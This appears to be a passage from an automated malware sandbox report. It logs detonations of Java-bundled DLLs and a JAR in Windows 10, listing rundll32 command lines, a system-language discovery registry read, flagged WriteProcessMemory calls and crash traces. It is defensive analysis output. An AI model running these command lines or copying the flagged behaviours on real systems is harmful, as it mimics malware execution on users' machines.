rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge-32.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4420 wrote to memory of 2380 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4420 wrote to memory of 2380 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4420 wrote to memory of 2380 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge-32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge-32.dll,#1

Network

Country Destination Domain Proto

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:14

Platform

win10v2004-20240802-en

Max time kernel

90s

Max time network

155s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\bci.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1852 wrote to memory of 4256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1852 wrote to memory of 4256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1852 wrote to memory of 4256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\bci.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\bci.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4256 -ip 4256

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 604

Network

Country Destination Domain Proto

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

149s

Max time network

159s

Command Line

java -jar C:\Users\Admin\AppData\Local\Temp\jre\asm-all.jar

Signatures

N/A

Processes

C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe

java -jar C:\Users\Admin\AppData\Local\Temp\jre\asm-all.jar

Network

Country Destination Domain Proto

Files

memory/4476-2-0x0000014311360000-0x00000143115D0000-memory.dmp

memory/4476-11-0x0000014311340000-0x0000014311341000-memory.dmp

memory/4476-12-0x0000014311360000-0x00000143115D0000-memory.dmp